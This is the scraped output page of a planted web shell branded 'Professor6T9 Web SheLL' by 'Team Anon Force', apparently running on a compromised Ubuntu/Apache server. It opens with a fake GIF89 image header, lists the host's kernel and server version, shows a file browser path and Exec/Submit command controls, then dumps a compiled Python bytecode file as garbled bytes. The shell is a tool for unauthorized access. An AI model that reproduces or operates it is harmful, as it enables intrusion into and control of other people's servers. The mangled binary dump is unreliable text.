GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux sonniq.ru 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
127.0.0.1
/
opt
/
ispmanager
/
python3.9
/
lib
/
python3.9
/
lib2to3
/
pgen2
/
__pycache__
[ HOME ]
Exec
Submit
parse.cpython-39.opt-2.pyc
a �"^R#?%� @ s0 d dl mZ G dd� de�ZG dd� de�ZdS )� )�tokenc @ s e Zd Zdd� Zdd� ZdS )� ParseErrorc C s4 t �| d||||f � || _|| _|| _|| _d S )Nz!%s: type=%r, value=%r, context=%r)� Exception�__init__�msg�type�value�context)�selfr r r r � r �>/opt/ispmanager/python3.9/lib/python3.9/lib2to3/pgen2/parse.pyr s �zParseError.__init__c C s t | �| j| j | j| jffS �N)r r r r )r r r r � __reduce__ s zParseError.__reduce__N)�__name__� __module__�__qualname__r r r r r r r s r c @ sH e Zd Zddd�Zddd�Zdd� Zdd � Zd d� Zdd � Zdd� Z dS )�ParserNc C s || _ |pdd� | _d S )Nc S s |S r r )�grammar�noder r r �<lambda>Z � z!Parser.__init__.<locals>.<lambda>)r �convert)r r r r r r r <